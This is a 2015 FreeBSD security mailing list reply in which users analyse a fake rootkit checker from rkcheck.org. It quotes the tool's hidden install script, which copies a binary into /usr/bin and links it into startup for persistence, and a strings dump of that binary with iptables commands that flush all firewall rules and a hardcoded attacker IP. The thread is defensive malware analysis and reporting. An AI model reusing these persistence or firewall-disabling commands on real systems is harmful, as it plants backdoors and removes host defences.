From owner-freebsd-security@FreeBSD.ORG Wed Feb 25 21:04:49 2015 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:1900:2254:206a::19:1]) (using TLSv1.2 with cipher AECDH-AES256-SHA (256/256 bits)) (No client certificate requested) by hub.freebsd.org (Postfix) with ESMTPS id 5FBE2BA4 for ; Wed, 25 Feb 2015 21:04:49 +0000 (UTC) Received: from mx2.nkhosting.net (mx2.nkhosting.net [109.75.177.32]) by mx1.freebsd.org (Postfix) with ESMTP id 164AF91E for ; Wed, 25 Feb 2015 21:04:48 +0000 (UTC) Received: from mx2filter1.nkhosting.net (unknown [109.75.177.32]) by mx2.nkhosting.net (Postfix) with ESMTP id 04E532D64136; Wed, 25 Feb 2015 22:04:47 +0100 (CET) X-Virus-Scanned: amavisd-new at mx2.nkhosting.net X-Spam-Flag: NO X-Spam-Score: -2.9 X-Spam-Level: X-Spam-Status: No, score=-2.9 tagged_above=-999 required=6.2 tests=[ALL_TRUSTED=-1, BAYES_00=-1.9] autolearn=ham autolearn_force=no Received: from mx2.nkhosting.net ([109.75.177.32]) by mx2filter1.nkhosting.net (mx2filter1.nkhosting.net [109.75.177.32]) (amavisd-new, port 10024) with ESMTP id k-jSo9W-yxPY; Wed, 25 Feb 2015 22:04:44 +0100 (CET) Received: from air13.t19.nkhosting.net (f053177190.adsl.alicedsl.de [78.53.177.190]) by mx2.nkhosting.net (Postfix) with ESMTPSA id A6DE72D631A7; Wed, 25 Feb 2015 22:04:44 +0100 (CET) Content-Type: text/plain; charset=utf-8 Mime-Version: 1.0 (Mac OS X Mail 8.1 \(1993\)) Subject: Re: has my 10.1-RELEASE system been compromised From: Philip Jocks In-Reply-To: <30A97E9B-5719-4DA3-ADFB-24A3FADF6D3C@schulte.org> Date: Wed, 25 Feb 2015 22:04:46 +0100 Content-Transfer-Encoding: quoted-printable Message-Id: <5FCD7882-9BED-4101-9722-D174AC5347E3@netzkommune.com> References: <864mq9zsmm.fsf@gly.ftfl.ca> <54EE2A19.7050108@FreeBSD.org> <86vbipycyc.fsf@gly.ftfl.ca> <1B20A559-59C5-477A-A2F3-9FD7E16C09E8@netzkommune.com> <86k2z5yc03.fsf@gly.ftfl.ca> <4EE57C1F-AB10-4BF1-A193-DB9C75A586FC@netzkommune.com> <30A97E9B-5719-4DA3-ADFB-24A3FADF6D3C@schulte.org> To: "freebsd-security@freebsd.org" X-Mailer: Apple Mail (2.1993) Cc: Joseph Mingrone X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.18-1 Precedence: list List-Id: "Security issues \[members-only posting\]" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Wed, 25 Feb 2015 21:04:49 -0000 > Am 25.02.2015 um 21:55 schrieb Christopher Schulte = : >=20 >=20 >> On Feb 25, 2015, at 2:34 PM, Philip Jocks = wrote: >>=20 >> it felt pretty scammy to me, googling for the "worm" got me to = rkcheck.org which was registered a few days ago and looks like a = tampered version of chkrootkit. I hope, nobody installed it anywhere, it = seems to execute rkcheck/tests/.unit/test.sh which contains=20 >>=20 >> #!/bin/bash >>=20 >> cp tests/.unit/test /usr/bin/rrsyncn >> chmod +x /usr/bin/rrsyncn >> rm -fr /etc/rc2.d/S98rsyncn >> ln -s /usr/bin/rrsyncn /etc/rc2.d/S98rsyncn >> /usr/bin/rrsyncn >> exit >>=20 >> That doesn't look like something you'd want on your box=E2=80=A6 >=20 > I filed a report with Google about that domain (Google Safe Browsing), = briefly describing what=E2=80=99s been recounted here on this thread. = It seems quite suspicious, agreed. >=20 > Has anyone started an analysis of the rrsyncn binary? The last few = lines of a simple string dump are interesting=E2=80=A6 take note what = looks to be an IP address of 95.215.44.195. >=20 > /bin/sh > iptables -X 2> /dev/null > iptables -F 2> /dev/null > iptables -t nat -F 2> /dev/null > iptables -t nat -X 2> /dev/null > iptables -t mangle -F 2> /dev/null > iptables -t mangle -X 2> /dev/null > iptables -P INPUT ACCEPT 2> /dev/null > iptables -P FORWARD ACCEPT 2> /dev/null > iptables -P OUTPUT ACCEPT 2> /dev/null > udevd > 95.215.44.195 > ;*3$" 95.215.44.195 is the IP of rkcheck.org. I contacted the yourserver.se = who own the network. Philip